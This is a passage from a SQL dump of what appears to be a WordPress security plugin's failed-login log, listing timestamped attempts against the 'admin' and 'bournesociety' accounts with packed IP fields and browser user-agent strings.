Firefox/62.0'),(4938,8187,1629444454.911736,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Q�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4939,8188,1629444813.526171,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@w_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4940,8189,1629445200.647283,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��P��\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4941,8190,1629445561.569269,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g��E','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4942,8191,1629445931.078601,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g%�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4943,8192,1629445963.044267,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Q�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4944,8193,1629446360.477030,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�d�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4945,8194,1629446714.277682,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gљ ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4946,8196,1629447950.947456,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��m�\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4947,8199,1629449182.304265,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���A��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4948,8199,1629449182.321073,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���A��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4949,8200,1629449573.669748,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����h�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4950,8201,1629450418.284632,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���U��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4951,8203,1629451300.799280,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4952,8204,1629451732.163736,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��hƬD','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4953,8205,1629452175.707685,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����#X','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4954,8206,1629452622.499836,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��6\'iX','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4955,8207,1629453062.733669,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��˫�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4956,8211,1629454852.428055,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@w','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4957,8213,1629455784.108033,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��n2U�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4958,8215,1629456722.503041,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C͘','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4959,8218,1629457224.687256,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���[h�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4960,8221,1629457696.043707,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��2��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4961,8222,1629458193.189320,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����9�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4962,8223,1629458682.021965,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��O���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4963,8227,1629461113.349083,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@v�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4964,8235,1629461648.724100,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gt�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4965,8253,1629462603.686227,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���~d','Mozilla/5.0'),(4966,8254,1629462655.770766,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���~d','Mozilla/5.0'),(4967,8256,1629462711.499571,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���~d','Mozilla/5.0'),(4968,8257,1629462762.946512,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���~d','Mozilla/5.0'),(4969,8258,1629462815.592941,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���~d','Mozilla/5.0'),(4970,8259,1629462863.722024,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���~d','Mozilla/5.0'),(4971,8266,1629463196.231651,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@Z0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4972,8272,1629463572.815984,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���~d','Mozilla/5.0'),(4973,8283,1629465255.450015,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Wb��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4974,8285,1629466284.059026,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����c','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4975,8288,1629472997.302437,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����~h','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36'),(4976,8289,1629473706.432082,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4977,8290,1629473708.936804,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4978,8291,1629473711.142245,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4979,8292,1629473711.833586,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4980,8293,1629473712.829034,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4981,8294,1629473713.398705,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4982,8295,1629473714.283824,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4983,8296,1629473715.349005,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4984,8297,1629473716.736451,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4985,8298,1629473717.110845,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4986,8299,1629473717.599162,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4987,8299,1629473717.607765,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4988,8300,1629473718.000715,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4989,8301,1629473718.504695,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4990,8302,1629473718.901033,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4991,8303,1629473719.365281,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4992,8304,1629473719.721176,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4993,8305,1629473720.153945,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4994,8306,1629473720.778350,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4995,8309,1629476087.090548,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��B�S','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(4996,8310,1629476975.330350,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���e��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4997,8312,1629478694.890733,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��s','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4998,8314,1629480101.732482,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gt�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4999,8315,1629480700.897712,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ǂ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5000,8316,1629480789.409924,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/��','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36'),(5001,8317,1629481235.660553,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5002,8318,1629481240.573441,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5003,8319,1629481244.416771,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5004,8320,1629481247.800568,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5005,8321,1629481253.078678,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5006,8322,1629481258.681110,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5007,8323,1629481265.556662,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5008,8324,1629481270.336653,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5009,8325,1629481275.170084,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5010,8326,1629481280.834522,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5011,8327,1629481280.835611,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����6','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5012,8328,1629481285.008301,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5013,8328,1629481285.392828,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5014,8329,1629481288.677399,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5015,8330,1629481292.707781,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5016,8331,1629481296.026376,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5017,8332,1629481302.317723,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5018,8333,1629481303.225033,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5019,8334,1629481304.299271,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5020,8335,1629481305.417914,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5021,8337,1629481853.396781,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���`J','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5022,8338,1629482418.427919,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��[�ȉ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5023,8339,1629482429.746800,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_��','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(5024,8340,1629483007.480805,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5025,8341,1629483578.090355,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@t�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5026,8342,1629484178.099614,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\0�D','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5027,8343,1629484777.337290,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k�R�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5028,8343,1629484777.435590,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k�R�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5029,8344,1629484862.725673,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36'),(5030,8345,1629485372.785471,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\'f!�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5031,8346,1629485583.918736,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��Ǩf�','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko/20100101 Firefox/31.0'),(5032,8347,1629485752.252519,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(5033,8348,1629485958.141793,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5034,8349,1629486521.530275,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/r�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5035,8350,1629487110.547350,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5036,8351,1629487402.172824,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��p','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36'),(5037,8351,1629487402.231115,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��p','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36'),(5038,8352,1629487689.539354,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e%�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5039,8352,1629487689.607767,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e%�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5040,8353,1629488296.020924,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����e�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5041,8354,1629488902.550166,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g|]�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5042,8355,1629489041.784925,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C�=�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(5043,8356,1629489507.713616,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5044,8357,1629490196.783401,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���l��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5045,8358,1629490668.163786,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��R�,�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36'),(5046,8359,1629490855.043909,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5047,8360,1629491552.761010,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��p�H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5048,8362,1629492280.129654,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���D�	','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(5049,8363,1629493290.322420,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5050,8364,1629493291.684988,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5051,8365,1629493292.918873,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5052,8366,1629493294.343803,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5053,8367,1629493296.187763,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5054,8368,1629493297.417406,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5055,8369,1629493299.027170,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5056,8370,1629493300.206067,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5057,8371,1629493301.410202,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5058,8372,1629493302.626378,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5059,8373,1629493304.851321,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5060,8373,1629493304.885224,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5061,8374,1629493306.131759,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 